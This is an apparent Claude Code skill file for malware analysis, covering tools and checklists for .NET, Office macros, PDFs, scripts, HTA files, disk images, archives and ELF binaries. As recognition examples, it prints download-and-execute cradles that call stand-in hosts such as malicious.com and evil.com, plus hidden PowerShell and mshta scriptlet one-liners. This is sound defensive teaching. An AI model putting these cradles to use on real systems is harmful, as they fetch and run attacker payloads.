Malware-analysis-claude-skills specialized-file-analyzer

Analyze specialized file types beyond standard PE executables - .NET assemblies, Office macros, PDFs, PowerShell scripts, JavaScript, archives, HTA files, disk images (ISO/IMG/VHD/VHDX), and Linux ELF binaries. Use when you encounter documents, scripts, disk images, or non-Windows executables that require format-specific analysis tools and techniques.

install

source · Clone the upstream repo

git clone https://github.com/gl0bal01/malware-analysis-claude-skills

Claude Code · Install into ~/.claude/skills/

T=$(mktemp -d) && git clone --depth=1 https://github.com/gl0bal01/malware-analysis-claude-skills "$T" && mkdir -p ~/.claude/skills && cp -r "$T/specialized-file-analyzer" ~/.claude/skills/gl0bal01-malware-analysis-claude-skills-specialized-file-analyzer && rm -rf "$T"

manifest: specialized-file-analyzer/SKILL.md

source content

Specialized File Analyzer

Expert analysis of non-PE file formats commonly used in malware campaigns: .NET, Office documents, PDFs, scripts, HTA files, disk images, archives, and Linux binaries.

When to Use This Skill

Use this skill when analyzing:

.NET/C# assemblies (.exe, .dll with .NET framework)
Office documents with macros (.docm, .xlsm, .doc, .xls)
PDF files (suspicious attachments, exploit documents)
Scripts (PowerShell .ps1, VBScript .vbs, JavaScript .js)
HTA files (.hta — HTML Applications executed by mshta.exe)
Disk images (.iso, .img, .vhd, .vhdx — container formats that bypass MOTW)
Archives (.zip, .rar, .7z, .tar.gz)
Shortcuts (.lnk files)
Linux binaries (ELF executables)
Batch files (.bat, .cmd)

Key indicator:

file

command shows non-PE32 executable or document type.

Quick File Type Identification

# Identify file type
file sample.bin

# Common outputs:
# "PE32+ console executable, for MS Windows" → Standard PE (use malware-triage)
# "PE32 executable (GUI) Intel 80386 Mono/.Net assembly" → .NET (use this skill)
# "Microsoft Office Document" → Office macro (use this skill)
# "PDF document, version 1.7" → PDF (use this skill)
# "HTML document text" → Check extension; if .hta → HTA (use this skill)
# "ISO 9660 CD-ROM filesystem data" → ISO image (use this skill)
# "DOS/MBR boot sector" → IMG disk image (use this skill)
# "Microsoft Disk Image" → VHD/VHDX (use this skill)
# "Zip archive data" → Archive (use this skill)
# "ELF 64-bit LSB executable" → Linux binary (use this skill)
# "ASCII text, with CRLF line terminators" → Script (use this skill)

.NET / C# Assembly Analysis

Detection

# Check for .NET assembly
file sample.exe | grep "Mono/.Net assembly"

# Or check strings
strings sample.exe | grep "mscoree.dll"

# Check PE header
pe-parser sample.exe | grep "CLR Runtime"

Tool: dnSpy (Windows - Primary Tool)

Download: https://github.com/dnSpy/dnSpy

Workflow:

Open sample.exe in dnSpy
Navigate: Assembly Explorer → sample.exe → Namespace → Classes
Find entry point: Right-click assembly → Go to Entry Point

What to Look For:

Main() Function:

// Entry point - start here
public static void Main(string[] args)
{
    // Analyze execution flow
}

Suspicious Namespaces:

```
System.Net
```
- Network operations (WebClient, HttpClient)
```
System.Security.Cryptography
```
- Encryption/decryption
```
System.Reflection
```
- Dynamic code loading
```
System.Diagnostics.Process
```
- Process execution
```
System.IO
```
- File operations
```
Microsoft.Win32
```
- Registry access

Common Malicious Patterns:

// Download and execute
WebClient wc = new WebClient();
wc.DownloadFile("http://malicious.com/payload.exe", "C:\\temp\\payload.exe");
Process.Start("C:\\temp\\payload.exe");

// Base64 decode embedded payload
byte[] decoded = Convert.FromBase64String(encodedPayload);

// Reflective loading
Assembly.Load(byte[] rawAssembly);

// Process injection
WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, out lpNumberOfBytesWritten);

Extract Embedded Resources:

Assembly Explorer → Right-click assembly → Resources
Look for:
- Embedded executables (byte arrays)
- Encrypted payloads
- Configuration data
- Icons (may hide data)

Right-click resource → Save

Deobfuscation:

# Using de4dot (automated deobfuscator)
de4dot sample.exe -o sample_deobfuscated.exe

# Handles common obfuscators:
# - ConfuserEx
# - .NET Reactor
# - Eazfuscator
# - Agile.NET

Dynamic Debugging:

dnSpy: Debug → Start Debugging (F5)
Set breakpoints on suspicious functions
Step through execution (F10/F11)
Watch variables and decrypted strings

Tool: ILSpy (Cross-platform Alternative)

# Command-line decompilation
ilspycmd sample.exe -o output_directory/

# GUI version (Windows/Linux/Mac)
ilspy sample.exe

Export decompiled code:

File → Save Code → C# Project

Analysis Checklist - .NET

Entry point identified (Main function)
Obfuscation detected and removed (if needed)
Embedded resources extracted
Network URLs/IPs extracted
Crypto keys identified
Anti-analysis checks found
Payload execution method documented
IOCs extracted (URLs, IPs, file paths)

Office Document / Macro Analysis

Detection

# Macro-enabled formats
# .docm, .xlsm, .pptm → Office 2007+ with macros
# .doc, .xls, .ppt → Legacy Office (97-2003) with macros

file document.docm
# Output: "Microsoft Word 2007+"

# Quick macro check
strings document.docm | grep -i "vba\|macro\|autoopen"

Tool: oledump.py (Primary - Didier Stevens)

Installation:

wget https://didierstevens.com/files/software/oledump_V0_0_70.zip
unzip oledump_V0_0_70.zip

Workflow:

1. List Streams:

python oledump.py document.docm

# Example output:
#  1:       114 '\x01CompObj'
#  2:      4096 '\x05DocumentSummaryInformation'
#  3: M    8192 'Macros/VBA/ThisDocument'  ← Macro present (M indicator)
#  4: m    1024 'Macros/VBA/_VBA_PROJECT'
#  5: M    4096 'Macros/VBA/Module1'

2. Extract Macro Code:

# Extract macro from stream 3
python oledump.py -s 3 -v document.docm

# Decompress corrupted VBA
python oledump.py -s 3 --vbadecompresscorrupt document.docm

# Save to file
python oledump.py -s 3 -v document.docm > extracted_macro.vba

3. Analyze Macro Code:

Look for Auto-Execution Functions:

Sub AutoOpen()          ' Word - runs on document open
Sub Document_Open()     ' Word - runs on document open
Sub Workbook_Open()     ' Excel - runs on workbook open
Sub Auto_Open()         ' Excel - runs on workbook open

Look for Suspicious VBA Functions:

' Command execution
Shell("cmd.exe /c powershell ...")
CreateObject("WScript.Shell").Run "..."

' File download
CreateObject("MSXML2.XMLHTTP")
URLDownloadToFile ...

' File system operations
CreateObject("Scripting.FileSystemObject")

' Dynamic code execution
ExecuteStatement
Eval()
CallByName()

Tool: olevba (oletools Suite)

Installation:

pip install oletools

Automated Analysis:

# Comprehensive analysis
olevba document.docm

# Decode obfuscated strings
olevba --decode document.docm

# JSON output for parsing
olevba -j document.docm > analysis.json

# Extract IOCs only
olevba --decode document.docm | grep -E "http|https|powershell|cmd|wscript"

Output Interpretation:

AutoExec - Auto-execution keywords found
Suspicious - Suspicious VBA keywords
IOCs - URLs, IPs, file paths
Hex Strings - Encoded data
Base64 Strings - Encoded payloads
Dridex Strings - Dridex malware indicators

Excel 4.0 Macros (XLM Macros)

More evasive than VBA macros!

# Detect XLM macros
python oledump.py document.xls | grep XL

# Extract with XLMMacroDeobfuscator
git clone https://github.com/DissectMalware/XLMMacroDeobfuscator
python XLMMacroDeobfuscator.py -f document.xls

# Or use olevba
olevba document.xls --deobf

Modern Office Documents (.docx, .xlsx) - No Macros

Template Injection Attack:

# Extract Office Open XML structure
unzip document.docx -d extracted/

# Check for external template
cat extracted/word/_rels/document.xml.rels | grep "http"

# Look for:
# <Relationship Type="http://schemas.../attachedTemplate"
#              Target="http://malicious.com/template.dotm" TargetMode="External"/>

Embedded Objects:

# Check for embedded files
ls extracted/word/embeddings/

# Analyze embedded objects
file extracted/word/embeddings/*

Analysis Checklist - Office Documents

Macro presence confirmed
All macro streams extracted
Auto-execution functions identified
Obfuscated strings decoded
Download URLs extracted
Payload execution method documented
External template checked (.docx/.xlsx)
Embedded objects analyzed
IOCs extracted and defanged

PDF Analysis

Detection

file document.pdf
# Output: "PDF document, version 1.7"

Tool: pdfid.py (Didier Stevens)

Quick Triage:

python pdfid.py document.pdf

# Red flags:
# /OpenAction   - Executes action on open
# /AA           - Additional actions (auto-execute)
# /JavaScript   - Embedded JavaScript
# /JS           - JavaScript (short form)
# /Launch       - Launch external program
# /EmbeddedFile - Embedded files
# /RichMedia    - Flash/multimedia content
# /ObjStm       - Object streams (can hide malicious content)

Example Output:

PDFiD 0.2.7 document.pdf
 PDF Header: %PDF-1.7
 obj                   45
 endobj                45
 stream                12
 endstream             12
 /Page                  5
 /Encrypt               0
 /ObjStm                0
 /JS                    3  ← Suspicious!
 /JavaScript            2  ← Suspicious!
 /AA                    1  ← Auto-action present!
 /OpenAction            1  ← Executes on open!
 /Launch                0
 /EmbeddedFile          0
 /RichMedia             0

Tool: pdf-parser.py (Didier Stevens)

Extract JavaScript:

# Search for JavaScript objects
python pdf-parser.py --search javascript document.pdf

# Extract specific object
python pdf-parser.py --object 15 document.pdf

# Dump JavaScript code
python pdf-parser.py --object 15 --raw document.pdf > extracted_js.txt

# Filter streams
python pdf-parser.py --filter document.pdf

Tool: peepdf (Interactive Analysis)

# Install (peepdf-3 is the Python 3 compatible fork)
pip install peepdf-3

# Interactive mode
peepdf -i document.pdf

# Commands in interactive shell:
> tree             # Show object structure
> object 15        # Inspect object 15
> stream 15        # View stream 15
> javascript       # Extract all JavaScript
> extract stream 15 > payload.bin

PDF Exploits

Common CVEs:

CVE-2013-2729 - JavaScript heap spray
CVE-2010-0188 - libtiff buffer overflow
CVE-2009-0927 - JBIG2Decode heap overflow
CVE-2023-21608 - Adobe Acrobat use-after-free (remote code execution)
CVE-2023-26369 - Adobe Acrobat out-of-bounds write (actively exploited in the wild)
CVE-2024-4367 - PDF.js arbitrary JavaScript execution in Firefox (affects web-based PDF viewers)
CVE-2023-36664 - Ghostscript command injection via crafted PDF (affects Linux/server-side rendering)

Shellcode Detection:

# Look for shellcode in streams
python pdf-parser.py --raw --filter document.pdf | grep -E "(\x90{10}|\xeb)"

# Extract suspicious streams
python pdf-parser.py --object <id> --raw document.pdf | hexdump -C

Analysis Checklist - PDF

pdfid scan completed (flags identified)
JavaScript extracted (if present)
Embedded files extracted
Auto-action mechanism documented
Shellcode indicators checked
CVE exploitation checked (if relevant)
URLs/IPs extracted from JS
IOCs documented

PowerShell / Script Analysis

PowerShell (.ps1) Deobfuscation

Common Obfuscation Patterns:

Base64 Encoding:

# Encoded command execution
powershell.exe -EncodedCommand <base64_string>

# Decode manually
$encoded = "Base64StringHere"
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded))

String Concatenation:

$url = "ht" + "tp://" + "evil.com"

Compression:

$ms = New-Object IO.MemoryStream
$ms.Write([Convert]::FromBase64String($compressed), 0, $compressedLength)
$ms.Seek(0,0) | Out-Null
$cs = New-Object IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Decompress)

Tool: PSDecode

# Install
git clone https://github.com/R3MRUM/PSDecode

# Deobfuscate PowerShell
Import-Module .\PSDecode.ps1
PSDecode -InputFile malicious.ps1 -OutputFile decoded.txt

Manual Analysis:

# Read script without executing
Get-Content malicious.ps1

# Search for key indicators
Select-String -Path malicious.ps1 -Pattern "Invoke-Expression|IEX|DownloadString|DownloadFile|FromBase64String"

Suspicious PowerShell Patterns:

```
Invoke-Expression
```
/
```
IEX
```
- Execute string as code
```
Invoke-WebRequest
```
/
```
Invoke-RestMethod
```
- Download content
```
DownloadString
```
/
```
DownloadFile
```
- Download payloads
```
FromBase64String
```
- Decode embedded payload
```
IO.Compression.GzipStream
```
- Decompress payload
```
Reflection.Assembly]::Load
```
- Load assembly from memory
```
-EncodedCommand
```
- Base64 encoded command
```
-WindowStyle Hidden
```
- Hide window
```
-ExecutionPolicy Bypass
```
- Bypass script execution policy

VBScript (.vbs) Analysis

Common Obfuscation Techniques:

Chr() Concatenation:

' Characters assembled from ASCII codes to hide strings
Dim cmd
cmd = Chr(99) & Chr(109) & Chr(100)   ' = "cmd"
CreateObject("WScript.Shell").Run cmd & ".exe /c " & Chr(112) & Chr(105) & Chr(110) & Chr(103) & " evil.com"

Execute / ExecuteGlobal:

' Execute() runs a string as code in the current scope
' ExecuteGlobal() runs a string as code in the global scope
Dim payload
payload = "CreateObject(" & Chr(34) & "WScript.Shell" & Chr(34) & ").Run " & Chr(34) & "calc.exe" & Chr(34)
Execute(payload)

' Chained: decode then execute
ExecuteGlobal(Base64Decode(encodedPayload))

String Reversal with StrReverse:

' String stored backwards to evade signature detection
Dim hidden
hidden = "elbatius/c/ exe.dmc"
CreateObject("WScript.Shell").Run StrReverse(hidden)

Replace() Chains:

' Junk characters inserted and stripped at runtime
Dim url
url = "hXXXtXXXtXXXpXXX:XXXXX//evil.com/payload.exe"
url = Replace(url, "XXX", "")   ' = "http://evil.com/payload.exe"

WScript.Shell via GetObject:

' Alternative to CreateObject — avoids direct string "WScript.Shell"
Set sh = GetObject("new:{72C24DD5-D70A-438B-8A42-98424B88AFB8}")
sh.Run "powershell -nop -w hidden -enc <base64>"

Deobfuscation Approach:

Manual Chr() Resolution:

# Extract all Chr() calls and resolve them
grep -oE "Chr\([0-9]+\)" malicious.vbs | sort -u

# Python one-liner to resolve Chr values from grep output
python3 -c "
import re, sys
code = open('malicious.vbs').read()
for m in re.finditer(r'Chr\((\d+)\)', code):
    print(f'Chr({m.group(1)}) = {chr(int(m.group(1)))}')
"

Extract Execute() Payloads:

' SAFE deobfuscation technique:
' Replace Execute() / ExecuteGlobal() with WScript.Echo() to print payload instead of running it
' Original:
Execute(decodedPayload)
' Change to:
WScript.Echo(decodedPayload)

' Then run in a safe environment to reveal the next stage
cscript /nologo malicious_safe.vbs

Variable Substitution Tracing:

# Trace variable assignments to follow payload construction
grep -n "=" malicious.vbs | grep -v "'.*="   # exclude comments
# Follow each variable from assignment to use, reconstructing the final value

Key Suspicious Patterns:

```
CreateObject("WScript.Shell")
```
- Execute OS commands, launch processes
```
GetObject("winmgmts:")
```
- WMI access (process creation, system enumeration)
```
Shell.Application
```
- Explorer shell invocation (can bypass some restrictions)
```
ADODB.Stream
```
- Binary file writes (used to drop PE payloads to disk)
```
MSXML2.XMLHTTP
```
/
```
WinHttp.WinHttpRequest
```
- HTTP download cradles
```
Scripting.FileSystemObject
```
- File system reads and writes
```
Execute
```
/
```
ExecuteGlobal
```
/
```
Eval
```
- Dynamic code execution (always deobfuscate before analyzing)
```
StrReverse
```
/
```
Chr()
```
/
```
Replace()
```
- String obfuscation primitives

Analysis:

# Read script
cat malicious.vbs

# Search for high-priority patterns
grep -i "CreateObject\|WScript.Shell\|MSXML2.XMLHTTP\|Eval\|Execute\|ExecuteGlobal\|ADODB.Stream\|GetObject\|StrReverse" malicious.vbs

# Deobfuscate: Replace Eval() / Execute() with WScript.Echo() to print instead of execute
# Then run safely: cscript /nologo malicious_safe.vbs

JavaScript (.js) Analysis

# Beautify obfuscated JS
cat malicious.js | js-beautify > beautified.js

# Online: https://beautifier.io/

Suspicious Patterns:

// Code execution
eval(encodedCode);

// Decode strings
unescape("%75%6E%65%73%63%61%70%65");
decodeURIComponent("%20");

// ActiveX (Windows COM objects)
var shell = new ActiveXObject("WScript.Shell");
shell.Run("cmd.exe /c ...");

// WScript objects
var fso = new ActiveXObject("Scripting.FileSystemObject");

Analysis Checklist - Scripts

Script type identified (PS1, VBS, JS, BAT)
Obfuscation detected and removed
Base64/encoded strings decoded
Download URLs extracted
Execution commands documented
Dropped file paths identified
IOCs extracted (URLs, IPs, domains)

Archive Analysis

Safe Inspection (No Extraction)

# List contents without extracting
7z l archive.zip
unzip -l archive.zip
tar -tzf archive.tar.gz
rar l archive.rar

# Look for red flags:
# - Double extensions (invoice.pdf.exe)
# - Executable files (.exe, .scr, .com, .bat, .vbs)
# - LNK files (shortcuts)
# - Deeply nested archives (archive.zip -> archive2.zip -> payload.exe)

Extract Safely

# Create isolated directory
mkdir /tmp/extracted_archive
cd /tmp/extracted_archive

# Extract
7z x ../archive.zip
unzip ../archive.zip
tar -xzf ../archive.tar.gz

# Immediately check file types
file *

Password-Protected Archives

Common passwords in malware:

```
infected
```
```
malware
```
```
virus
```
```
2024
```
/
```
2025
```
```
123456
```

# Extract with password
7z x -pinfected archive.zip
unzip -P infected archive.zip

LNK (Shortcut) File Analysis

Tool: LECmd (Windows)

# Download from: https://ericzimmerman.github.io/
LECmd.exe -f malicious.lnk

Tool: lnkinfo (Linux)

lnkinfo malicious.lnk

# Look for:
# - Target path (what it executes)
# - Command-line arguments
# - Working directory
# - Icon location (may reveal payload location)

Manual Strings Analysis:

strings malicious.lnk | grep -E "\.exe|\.dll|http|powershell|cmd"

Analysis Checklist - Archives

Contents listed without extraction
File extensions verified (no double extensions)
Files extracted to isolated directory
All extracted files typed (file command)
LNK files analyzed (if present)
Nested archives checked
Password documented (if applicable)

HTA (HTML Application) Analysis

What HTA Files Are

HTA files (

.hta

) are HTML documents executed by

mshta.exe

(Microsoft HTML Application Host) rather than a web browser. Because mshta.exe is a trusted Windows binary, HTAs run with the full privileges of the current user and have unrestricted access to COM objects, ActiveX controls, and the local file system — none of the browser sandbox restrictions apply. This makes HTAs a popular delivery vehicle for malware, often distributed via phishing emails or dropped inside ISO/ZIP archives.

MITRE ATT&CK: T1218.005 — System Binary Proxy Execution: Mshta

Detection

# File identification
file suspicious.hta
# Output: "HTML document text" (always verify the extension separately)

# Quick check for execution indicators
strings suspicious.hta | grep -iE "mshta|WScript|Shell|ActiveX|XMLHTTP|powershell"

Analysis Approach

HTAs are plain text — open them in any text editor or IDE. The analysis goal is to extract and understand all embedded scripts before any execution occurs.

1. Extract Embedded Scripts

# View raw content
cat suspicious.hta

# Grep for script blocks
grep -i "<script" suspicious.hta

# Pull out VBScript/JScript content between script tags
grep -A 50 "<script" suspicious.hta

2. Check for ActiveX Object Instantiation

ActiveX objects are the primary attack surface in HTAs. Flag every

CreateObject

and

new ActiveXObject

call:

' VBScript - common ActiveX patterns
Set sh  = CreateObject("WScript.Shell")               ' OS command execution
Set fso = CreateObject("Scripting.FileSystemObject")  ' File I/O
Set xhr = CreateObject("MSXML2.XMLHTTP")               ' HTTP download
Set xhr = CreateObject("WinHttp.WinHttpRequest.5.1")  ' Alternative HTTP

// JScript - equivalent patterns
var sh  = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var xhr = new ActiveXObject("MSXML2.XMLHTTP");

3. Look for High-Priority Execution Sinks

grep -iE "Shell\.Run|ShellExecute|WScript\.Shell|Scripting\.FileSystemObject|XMLHTTP|WinHttp|powershell|cmd\.exe|wscript|cscript|regsvr32|rundll32|msiexec" suspicious.hta

4. Decode Obfuscated Payloads

HTA malware frequently encodes payloads in

innerHTML

, script variables, or injected DOM content:

# Find base64 strings (look for long alphanum strings)
grep -oE "[A-Za-z0-9+/]{40,}={0,2}" suspicious.hta

# Find HTML-entity or percent-encoded strings
grep -oE "&#[0-9]+;" suspicious.hta
grep -oE "%[0-9A-Fa-f]{2}" suspicious.hta

Decode base64 payload (Linux):

echo "Base64StringHere" | base64 -d > decoded_payload.bin
file decoded_payload.bin

Decode base64 payload (PowerShell — for Unicode-encoded commands):

[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("Base64StringHere"))

Common Malware Patterns

Download-and-Execute via XMLHTTP:

Set xhr = CreateObject("MSXML2.XMLHTTP")
xhr.Open "GET", "http://malicious[.]com/payload.exe", False
xhr.Send
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1   ' Binary
stream.Open
stream.Write xhr.responseBody
stream.SaveToFile "C:\Users\Public\payload.exe", 2
stream.Close
CreateObject("WScript.Shell").Run "C:\Users\Public\payload.exe"

PowerShell Invocation (common cradle):

CreateObject("WScript.Shell").Run "powershell -nop -w hidden -enc <base64>", 0, False

Payload hidden in innerHTML and read back at runtime:

<div id="data" style="display:none">TVqQAAMAAAAEAAAA...</div>
<script language="VBScript">
  Dim raw
  raw = document.getElementById("data").innerHTML
  ' decode and execute raw
</script>

mshta.exe executing inline script (seen in phishing URLs):

mshta.exe javascript:a=(GetObject("script:http://malicious[.]com/payload.sct")).Exec();close();

Tools

Task	Tool
Read/edit HTA content	Any text editor (VS Code, Notepad++, vim)
DOM structure inspection	Browser dev tools (open as HTML — do NOT click Run)
Decode base64 strings	`base64 -d` (Linux), CyberChef
Chr()/VBS deobfuscation	Manual or `cscript` with Execute→Echo swap (see VBScript section)
Trace COM object calls	Process Monitor (filter on mshta.exe) — dynamic analysis VM only

Analysis Checklist - HTA

File opened as plain text — script language identified (VBScript / JScript / mixed)
All
```
CreateObject
```
/
```
new ActiveXObject
```
calls enumerated
```
Shell.Run
```
/
```
ShellExecute
```
arguments extracted
Download URLs identified (XMLHTTP, WinHttp, URLDownloadToFile)
Encoded payloads (base64, Chr(), HTML entities) decoded
innerHTML / injected DOM payload sources checked
Dropped file paths documented
IOCs extracted and defanged

Disk Image Analysis (ISO / IMG / VHD / VHDX)

Why Malware Uses Disk Images

Disk images are a primary MOTW (Mark-of-the-Web) bypass technique on Windows 10 and 11. When a file is downloaded from the internet, Windows attaches a Zone Identifier alternate data stream (

Zone.Identifier:$DATA

, Zone 3) to flag it as untrusted. Files extracted from a mounted disk image do not inherit the source image's MOTW, so payloads inside an ISO/VHD execute without SmartScreen prompts or Protected View restrictions.

Additionally,

.iso

files auto-mount as a virtual DVD drive on double-click in Windows 10+, and

.vhd

.vhdx

files auto-mount as a virtual disk — making the delivery seamless for the victim.

MITRE ATT&CK: T1553.005 — Subvert Trust Controls: Mark-of-the-Web Bypass

Detection

file suspicious.iso
# "ISO 9660 CD-ROM filesystem data"

file suspicious.img
# "DOS/MBR boot sector" or "Linux rev 1.0 ext2 filesystem data"

file suspicious.vhd
# "Microsoft Disk Image, Virtual Server or Virtual PC, version 0x00010000"

file suspicious.vhdx
# "Microsoft Disk Image eXtended"

Analysis Approach

Always analyze disk images read-only and without executing any contained files outside an isolated VM.

Option A: Extract Without Mounting (Safest — 7-Zip)

Works on Linux, Windows, and macOS. No kernel interaction required.

# List contents first
7z l suspicious.iso

# Extract to isolated directory
mkdir /tmp/iso_contents
7z x suspicious.iso -o/tmp/iso_contents/

# Identify all extracted files
file /tmp/iso_contents/*
find /tmp/iso_contents/ -type f | xargs file

Option B: Mount Read-Only (Linux)

# ISO / IMG
sudo mkdir /mnt/suspicious_iso
sudo mount -o loop,ro suspicious.iso /mnt/suspicious_iso

# List all files including hidden
ls -la /mnt/suspicious_iso/
find /mnt/suspicious_iso/ -type f

# Identify file types
find /mnt/suspicious_iso/ -type f -exec file {} \;

# Copy files out for analysis (do not execute in place)
cp -r /mnt/suspicious_iso/ /tmp/iso_extracted/

# Unmount when done
sudo umount /mnt/suspicious_iso

Option C: Mount Read-Only (Windows — analysis VM only)

# Mount as read-only virtual drive
$img = Mount-DiskImage -ImagePath "C:\analysis\suspicious.iso" -Access ReadOnly -PassThru
$driveLetter = ($img | Get-Volume).DriveLetter

# List all files including hidden
Get-ChildItem "${driveLetter}:\" -Recurse -Force | Select FullName, Attributes, Length

# Copy contents for analysis
Copy-Item "${driveLetter}:\*" "C:\analysis\extracted\" -Recurse -Force

# Dismount
Dismount-DiskImage -ImagePath "C:\analysis\suspicious.iso"

VHD/VHDX on Linux:

# Install qemu tools if needed
sudo apt install qemu-utils

# Convert VHD to raw for mounting
qemu-img convert -f vpc suspicious.vhd suspicious_raw.img
sudo mount -o loop,ro suspicious_raw.img /mnt/vhd_mount/

What to Look For

1. LNK + Hidden DLL/EXE (Most Common Pattern)

The canonical ISO malware delivery pattern:

archive.iso/
  Invoice.lnk          <- Victim double-clicks this
  document.pdf          <- Decoy shown to victim
  payload.dll           <- Hidden (file attribute set); executed by LNK via rundll32

# Find hidden files (Linux mount)
find /mnt/suspicious_iso/ -name ".*"
ls -la /mnt/suspicious_iso/

# Analyze LNK files
lnkinfo Invoice.lnk   # Linux
strings Invoice.lnk | grep -E "\.exe|\.dll|rundll32|cmd|powershell"

2. Decoy Documents

Disk images frequently contain a visible, benign-looking document (PDF, DOCX) displayed to the victim while the payload runs in the background. Flag any document files and analyze them separately using the appropriate section of this skill.

3. File Naming Tricks

# Check for double extensions and right-to-left override (RTLO) tricks
ls -la /mnt/suspicious_iso/
# e.g. a filename containing U+202E (RTLO) makes "exe.doc" display as "cod.exe"

# Detect non-ASCII characters in filenames
find /mnt/suspicious_iso/ -print | cat -v | grep -v "^[[:print:]]*$"

4. Autorun Configuration

# Check for autorun.inf (older technique, still seen in IMG files)
cat /mnt/suspicious_iso/autorun.inf 2>/dev/null

Contained File Routing

Once files are extracted, route each to the appropriate analysis path:

Extracted File Type	Next Step
`.lnk`	LNK Analysis section (this skill)
`.dll` / `.exe` (PE)	malware-triage then malware-dynamic-analysis
`.ps1` / `.vbs` / `.js`	Script Analysis section (this skill)
`.docm` / `.xlsm`	Office Macro Analysis section (this skill)
`.hta`	HTA Analysis section (this skill)
Nested `.zip` / `.iso`	Repeat disk image / archive analysis

Analysis Checklist - Disk Images

File type confirmed (
```
file
```
command)
Contents listed before extraction
Extracted to isolated directory (read-only mount or 7-Zip)
All files identified with
```
file
```
command (do not trust extensions)
Hidden files checked (
```
-a
```
flag /
```
Get-ChildItem -Force
```
)
LNK files analyzed — target, arguments, working directory documented
Decoy documents identified
RTLO / double-extension filename tricks checked
autorun.inf inspected (if present)
Payload files routed to appropriate analysis skill
MOTW bypass technique documented in report

Linux / ELF Binary Analysis

Detection

file sample.bin
# Output: "ELF 64-bit LSB executable, x86-64"

Static Analysis

ELF Header:

readelf -h sample.bin

# Shows:
# - Architecture (x86, x86-64, ARM)
# - Entry point address
# - Program header offset
# - Section header offset

Sections:

readelf -S sample.bin

# Look for suspicious sections:
# - High entropy sections (encrypted/packed)
# - Unusual section names
# - RWX sections (read-write-execute)

Imported Libraries:

ldd sample.bin

# Look for:
# - libssl.so (crypto/network)
# - libc.so (standard)
# - Unusual paths (/tmp/lib.so)

Imported Symbols:

nm -D sample.bin
objdump -T sample.bin

# Search for suspicious functions:
nm -D sample.bin | grep -E "socket|connect|fork|exec|ptrace|system"

Strings:

strings -a sample.bin | grep -E "http|/tmp|/etc|passwd"

Dynamic Analysis (Linux)

strace - System Call Monitoring:

# Monitor all system calls
strace -f ./sample.bin 2>&1 | tee strace_output.txt

# Monitor specific calls
strace -e trace=network,file,process ./sample.bin

# File operations only
strace -e trace=open,read,write,close ./sample.bin

# Network operations only
strace -e trace=socket,connect,send,recv ./sample.bin

ltrace - Library Call Monitoring:

ltrace -f ./sample.bin 2>&1 | tee ltrace_output.txt

Check for Packing:

# UPX detection
readelf -S sample.bin | grep UPX

# Unpack UPX
upx -d sample.bin -o sample_unpacked.bin

Analysis Checklist - ELF

Architecture identified (x86/x64/ARM)
Imported libraries documented
Suspicious functions identified
Packing detected and removed (if UPX)
Strings extracted and analyzed
System calls monitored (strace)
Network activity captured
File operations documented

Integration with Report Writing

Each file type contributes specific sections to the malware analysis report:

.NET Analysis →

Decompiled code snippets
Embedded resource descriptions
Obfuscation techniques used
Reflective loading mechanisms

Office Macros →

Macro code (sanitized)
Auto-execution methods
Download URLs
Payload dropping process

PDF Analysis →

Embedded JavaScript
Auto-action triggers
Exploit CVEs (if applicable)
Shellcode presence

Scripts →

Deobfuscated code
Execution flow
Download cradles
C2 communications

Archives/LNK →

Archive structure
Masquerading techniques
LNK target analysis
Social engineering aspects

HTA Files →

Extracted VBScript/JScript
ActiveX objects abused
Download cradle URLs
PowerShell invocation chains

Disk Images (ISO/VHD) →

Container structure and hidden files
MOTW bypass technique documented
LNK target and payload relationship
Decoy document identified

ELF Binaries →

System calls used
Network protocols
Persistence mechanisms (cron, systemd)
Rootkit indicators

Tool Quick Reference

File Type	Primary Tool	Secondary Tool
.NET	dnSpy	ILSpy, de4dot
Office Macros	oledump.py	olevba, XLMMacroDeobfuscator
PDF	pdfid.py, pdf-parser.py	peepdf
PowerShell	PSDecode	Manual analysis
VBScript/JS	Text editor + analysis	js-beautify
HTA	Text editor + grep	CyberChef (decode), Process Monitor (dynamic)
ISO/IMG/VHD/VHDX	7-Zip (extract), mount -o ro (Linux)	Mount-DiskImage (Windows), qemu-utils (VHD)
Archives	7z, unzip, tar	-
LNK	LECmd (Win), lnkinfo (Linux)	strings
ELF	readelf, nm, objdump	strace, ltrace

Best Practices

Do:

Always identify file type first (
```
file
```
command)
Extract in isolated environments
Document obfuscation techniques
Save original and deobfuscated versions
Test extracted IOCs for accuracy
Cross-reference with VirusTotal/MalwareBazaar

Don't:

Execute scripts without understanding them first
Trust file extensions (check magic bytes)
Skip deobfuscation steps
Extract archives directly to important directories
Assume password-protected = safe

Example Usage

User request: "I have a suspicious .docm file with macros, help me analyze it"

Workflow:

Confirm file type (Office document)
Use oledump.py to list streams
Extract VBA macro code
Identify auto-execution functions
Decode obfuscated strings
Extract download URLs and IOCs
Document payload delivery method
Prepare findings for report